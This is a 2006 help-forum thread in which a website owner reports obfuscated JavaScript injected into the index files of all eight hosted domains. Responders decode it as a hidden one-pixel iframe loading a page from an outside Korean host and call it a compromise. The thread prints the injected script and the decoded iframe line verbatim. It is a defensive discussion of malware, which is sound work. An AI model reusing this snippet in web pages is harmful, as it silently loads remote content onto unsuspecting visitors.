?
Solved

Is my hosting secure?

Posted on 2006-05-13
4
Medium Priority
?
184 Views
Last Modified: 2010-03-04
For some strange reason on all 8 domain I have hosted with a web hosting company (websitesource.com) someone or something has added this code to the bottom of the index file:

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var
str="60!105!102!114!97!109!101!32!115!114!99!61!104!116!116!112!58!47!47!120!45!114!111!97!100!46!99!111!46!107!114!47!114!105!99!104!47!111!117!116!46!112!104!112!32!119!105!100!116!104!61!49!32!104!101!105!103!104!116!61!49!62!60!47!105!102!114!97!109!101!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

I certainly didn't do that and have no idea what the code does. Does that mean my account has been hacked?

Please advise as to what I can do to prevent this / fix this probem.  Obviously, I have removed the code, but want to know where it came from, how it got there, how to prevent it from coming back and most importantly, if my server has been compromised.

Thanks,
Chris
0
Comment
Question by:WF_Whistler
  • 2
4 Comments
 
LVL 10

Accepted Solution

by:
sleep_furiously earned 195 total points
ID: 16678601
What this javascript does is add the following HTML to the page:

   <iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>

A quick google search shows a similar complaint, and a suggestion that security breach might not be individual account, but breach of host company security.
http://www.killersites.com/mvnforum/mvnforum/viewthread?thread=3997

I can't really tell you how it got there though.



0
 
LVL 2

Assisted Solution

by:webcs
webcs earned 180 total points
ID: 16692049
WF, yeah that's definitely a security breach.

I work for one of the oldest hsoting companies in the world and there is NO reason to alter every file esp with that.   Now if it was free hosting and they were adding ads then that is one thing but I assume this is paid.

That is definitely a hack.  I am surprised that you did not ask your hosting company this question though, are they not answering you or something.

But quick answer from someone who knows, there is NO reason to add any code to a file like that.
0
 

Author Comment

by:WF_Whistler
ID: 16825047
I've asked them about it and they of course said they know nothing about it.  Not sure if my account was hacked or the entire server (it's shared).  I've changed all my passwords and will keep an eye on it to make sure it doesn't happen again.
0
 

Author Comment

by:WF_Whistler
ID: 16825054
How do I split the points between you two for both helping out?
0

Featured Post

VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Introduction As you’re probably aware the HTTP protocol offers basic / weak authentication, which in combination with the relevant configuration on your web server, provides the ability to password protect all or part of your host.  If you were not…
Introduction This article is intended for those who are new to PHP error handling (https://www.experts-exchange.com/articles/11769/And-by-the-way-I-am-New-to-PHP.html).  It addresses one of the most common problems that plague beginning PHP develop…
Is your data getting by on basic protection measures? In today’s climate of debilitating malware and ransomware—like WannaCry—that may not be enough. You need to establish more than basics, like a recovery plan that protects both data and endpoints.…
As many of you are aware about Scanpst.exe utility which is owned by Microsoft itself to repair inaccessible or damaged PST files, but the question is do you really think Scanpst.exe is capable to repair all sorts of PST related corruption issues?
Suggested Courses
Course of the Month17 days, 2 hours left to enroll

862 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question